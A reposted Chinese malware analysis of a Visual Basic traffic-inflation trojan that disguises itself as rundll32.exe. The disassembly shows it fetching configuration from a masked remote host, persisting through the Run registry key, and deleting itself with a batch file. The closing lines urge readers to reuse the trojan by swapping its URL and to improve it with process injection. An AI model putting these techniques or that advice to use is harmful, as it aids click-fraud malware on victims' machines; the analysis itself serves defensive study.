天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

黑客谈之对一刷网站访问量的小马分析

  系统补丁打完,网上瞎灌,居然还中网马,哎!现在把他网马下载下来,不错,真牛,通杀Windwos98、WindwosNT、Windwos2000、WindwosXP、WindwosXPSP2、Windwos2003。自己留着,随便来分析了下他的木马。一刷流量木马。服了。现在小马都出到这个份上了。

  脱壳略,VB编写。

00403DAD . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>; msvbvm60.__vbaHresultCheckObj 00403DB3 . 8985 E0FCFFFF MOV DWORD PTR SS:[EBP-320],EAX 00403DB9 . EB 0A JMP SHORT Rundll32.00403DC5 00403DBB > C785 E0FCFFFF>MOV DWORD PTR SS:[EBP-320],0 00403DC5 > 8B95 60FEFFFF MOV EDX,DWORD PTR SS:[EBP-1A0] 00403DCB . 8995 F8FCFFFF MOV DWORD PTR SS:[EBP-308],EDX 00403DD1 . C785 60FEFFFF>MOV DWORD PTR SS:[EBP-1A0],0 00403DDB . 8B85 F8FCFFFF MOV EAX,DWORD PTR SS:[EBP-308] 00403DE1 . 8985 34FEFFFF MOV DWORD PTR SS:[EBP-1CC],EAX 00403DE7 . C785 2CFEFFFF>MOV DWORD PTR SS:[EBP-1D4],8 00403DF1 . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4] 00403DF7 . 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108] 00403DFD . FF15 08104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarMo>; msvbvm60.__vbaVarMove 00403E03 . C745 FC 06000>MOV DWORD PTR SS:[EBP-4],6 00403E0A . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adset.txt" 00403E14 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8 00403E1E . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234] 00403E24 . 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60] 00403E27 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy 00403E2D . C745 FC 07000>MOV DWORD PTR SS:[EBP-4],7 00403E34 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt" 00403E3E . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8 00403E48 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234] 00403E4E . 8D8D 6CFFFFFF LEA ECX,DWORD PTR SS:[EBP-94] 00403E54 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy 00403E5A . C745 FC 08000>MOV DWORD PTR SS:[EBP-4],8 00403E61 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp" 00403E6B . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8 00403E75 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234] 00403E7B . 8D4D 8C LEA ECX,DWORD PTR SS:[EBP-74] 00403E7E . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy 00403E84 . C745 FC 09000>MOV DWORD PTR SS:[EBP-4],9 00403E8B . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adiepage.txt" 00403E95 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8 00403E9F . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234] 00403EA5 . 8D8D B8FEFFFF LEA ECX,DWORD PTR SS:[EBP-148] 00403EAB . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy 00403EB1 . C745 FC 0A000>MOV DWORD PTR SS:[EBP-4],0A 00403EB8 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/ieFavorites.txt" 00403EC2 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8 00403ECC . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234] 00403ED2 . 8D8D 7CFFFFFF LEA ECX,DWORD PTR SS:[EBP-84] 00403ED8 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy 00403EDE . C745 FC 0B000>MOV DWORD PTR SS:[EBP-4],0B 00403EE5 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "WinDir" 00403EEF . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8 00403EF9 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234] 00403EFF . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4] 00403F05 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDu>; msvbvm60.__vbaVarDup 00403F0B . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4] 00403F11 . 51 PUSH ECX 00403F12 . 8D95 1CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1E4] 00403F18 . 52 PUSH EDX 00403F19 . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar 00403F1F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>; UNICODE "\rundll32.exe" 00403F29 . C785 BCFDFFFF>MOV DWORD PTR SS:[EBP-244],8

  程序会到http://www.xxxxxxxx.com 的tc文件读取配置文件,同时访问tc/MMResult.asp,生成文件

  

00404DA2 . /EB 0A JMP SHORT Rundll32.00404DAE //获取文件路径堆栈 00404DA4 > |C785 88FCFFFF>MOV DWORD PTR SS:[EBP-378],0 00404DAE > \8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0] //我程序路径是 "D:\fuck you" 00404DB4 . 50 PUSH EAX //路径入eax 00404DB5 . 68 80274000 PUSH Rundll32.00402780 ; //生成killme.bat 00404DBA . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat 00404DC0 . 8BD0 MOV EDX,EAX //文件路径+文件名字D:\fuck you\killme.bat 00404DC2 . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4] 00404DC8 . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove 00404DCE . 50 PUSH EAX 00404DCF . 6A 01 PUSH 1 00404DD1 . 6A FF PUSH -1 00404DD3 . 6A 02 PUSH 2 00404DD5 . FF15 28114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFileOp>; msvbvm60.__vbaFileOpen 00404DDB . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4] 00404DE1 . 51 PUSH ECX 00404DE2 . 8D95 60FEFFFF LEA EDX,DWORD PTR SS:[EBP-1A0] 00404DE8 . 52 PUSH EDX 00404DE9 . 6A 02 PUSH 2 00404DEB . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList 00404DF1 . 83C4 0C ADD ESP,0C 00404DF4 . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0] 00404DFA . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj 00404E00 . C745 FC 23000>MOV DWORD PTR SS:[EBP-4],23 00404E07 . 68 9C274000 PUSH Rundll32.0040279C ; @echo off 00404E0C . 6A 01 PUSH 1 00404E0E . 68 B4274000 PUSH Rundll32.004027B4 00404E13 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile 00404E19 . 83C4 0C ADD ESP,0C 00404E1C . C745 FC 24000>MOV DWORD PTR SS:[EBP-4],24 00404E23 . 68 BC274000 PUSH Rundll32.004027BC ; sleep 100 00404E28 . 6A 01 PUSH 1 00404E2A . 68 B4274000 PUSH Rundll32.004027B4 00404E2F . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile 00404E35 . 83C4 0C ADD ESP,0C 00404E38 . C745 FC 25000>MOV DWORD PTR SS:[EBP-4],25 00404E3F . 833D A8934000>CMP DWORD PTR DS:[4093A8],0 00404E46 . 75 1C JNZ SHORT Rundll32.00404E64 00404E48 . 68 A8934000 PUSH Rundll32.004093A8 00404E4D . 68 94254000 PUSH Rundll32.00402594 00404E52 . FF15 30114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaNew2>] ; msvbvm60.__vbaNew2 00404E58 . C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409> 00404E62 . EB 0A JMP SHORT Rundll32.00404E6E 00404E64 > C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409> 00404E6E > 8B85 84FCFFFF MOV EAX,DWORD PTR SS:[EBP-37C] 00404E74 . 8B08 MOV ECX,DWORD PTR DS:[EAX] ........ 00404F1D . 52 PUSH EDX 00404F1E . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresul>; msvbvm60.__vbaHresultCheckObj 00404F24 . 8985 7CFCFFFF MOV DWORD PTR SS:[EBP-384],EAX 00404F2A . EB 0A JMP SHORT Rundll32.00404F36 00404F2C > C785 7CFCFFFF>MOV DWORD PTR SS:[EBP-384],0 00404F36 > 68 D4274000 PUSH Rundll32.004027D4 ; del 00404F3B . 8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0] //程序的文件名字 00404F41 . 50 PUSH EAX //文件名入栈 (rundll322) 00404F42 . 68 E4274000 PUSH Rundll32.004027E4 ; .exe (rundll322.exe) 00404F47 . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat 00404F4D . 8BD0 MOV EDX,EAX 00404F4F . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4] 00404F55 . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove 00404F5B . 50 PUSH EAX 00404F5C . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat 00404F62 . 8BD0 MOV EDX,EAX //(del rundll322.exe) 00404F64 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8] 00404F6A . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove 00404F70 . 50 PUSH EAX 00404F71 . 6A 01 PUSH 1 00404F73 . 68 B4274000 PUSH Rundll32.004027B4 00404F78 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile 00404F7E . 83C4 0C ADD ESP,0C 00404F81 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8] 00404F87 . 51 PUSH ECX 00404F88 . 8D95 5CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1A4] 00404F8E . 52 PUSH EDX 00404F8F . 8D85 60FEFFFF LEA EAX,DWORD PTR SS:[EBP-1A0] 00404F95 . 50 PUSH EAX 00404F96 . 6A 03 PUSH 3 00404F98 . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList 00404F9E . 83C4 10 ADD ESP,10 00404FA1 . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0] 00404FA7 . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj 00404FAD . C745 FC 26000>MOV DWORD PTR SS:[EBP-4],26 00404FB4 . 68 F4274000 PUSH Rundll32.004027F4 ; del killme.bat 00404FB9 . 6A 01 PUSH 1 00404FBB . 68 B4274000 PUSH Rundll32.004027B4 00404FC0 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile 00404FC6 . 83C4 0C ADD ESP,0C 00404FC9 . C745 FC 27000>MOV DWORD PTR SS:[EBP-4],27 00404FD0 . 68 18284000 PUSH Rundll32.00402818 ; cls 00404FD5 . 6A 01 PUSH 1 00404FD7 . 68 B4274000 PUSH Rundll32.004027B4 00404FDC . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile 00404FE2 . 83C4 0C ADD ESP,0C 00404FE5 . C745 FC 28000>MOV DWORD PTR SS:[EBP-4],28 00404FEC . 68 24284000 PUSH Rundll32.00402824 ; exit 00404FF1 . 6A 01 PUSH 1 00404FF3 . 68 B4274000 PUSH Rundll32.004027B4 00404FF8 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile 00404FFE . 83C4 0C ADD ESP,0C 00405001 . C745 FC 29000>MOV DWORD PTR SS:[EBP-4],29 00405008 . 6A 01 PUSH 1 0040500A . FF15 A4104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFileCl>; msvbvm60.__vbaFileClose 00405010 . C745 FC 2A000>MOV DWORD PTR SS:[EBP-4],2A 00405017 . 833D A8934000>CMP DWORD PTR DS:[4093A8],0 0040501E . 75 1C JNZ SHORT Rundll32.0040503C 00405020 . 68 A8934000 PUSH Rundll32.004093A8 00405025 . 68 94254000 PUSH Rundll32.00402594

生成批处删记录

  

killme.bat echo off sleep 100 del rundll322.exe del killme.bat cls exit

简单的写注册表run。

  

004046ED . BA 5C284000 MOV EDX,Rundll32.0040285C ; software\microsoft\windows\currentversion\run 004046F2 . 8D8D 08FFFFFF LEA ECX,DWORD PTR SS:[EBP-F8] 004046F8 . FF15 40114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCop>; msvbvm60.__vbaStrCopy 004046FE . C745 FC 17000>MOV DWORD PTR SS:[EBP-4],17 00404705 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.00402>; windir 0040470F . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8 00404719 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234] 0040471F . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4] 00404725 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDup>; msvbvm60.__vbaVarDup 0040472B . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4] 00404731 . 52 PUSH EDX 00404732 . 8D85 1CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1E4] 00404738 . 50 PUSH EAX 00404739 . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnvironV>; msvbvm60.rtcEnvironVar 0040473F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.00402>; \rundll32.exe

  直接给出分析的总结吧。程序只是为了刷访问量,没有什么后门,也就隐藏了URL,用XXXX代理了。

  程序运行后,你的电脑会访问 http://www.xxxxxxxx.com/tc/MMResult.asp

  看代码

  

<HTML><HEAD><TITLE>.</TITLE> <meta http-equiv="refresh" content="1; url=http://www.xxxx.net"> ‘地址用xxx代替了 </HEAD><BODY> <script src='http://s47.cnzz.com/stat.php?id=223697&web_id=223697' language='JavaScript' charset='gb2312'></script> ’站长站的流量统计 </BODY></HTML>

  把自身复制到c:/windows/,会生成批处删本地目录运行程序。

  

killme.bat echo off sleep 100 del rundll322.exe del killme.bat cls exit

  程序的运行方式是 写注册表

  

software\microsoft\windows\currentversion\run

  键值rundll32.exe

  程序写的不好,要插入进程,那效果会好点。只要把他程序的URL修改一下这个木马就可以自己使用了。

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理,安装维护:


本文来源:邪恶八进制信息安全团队 作者:佚名

声明
本文来源地址:0
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系Email:support@txwb.com.,本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行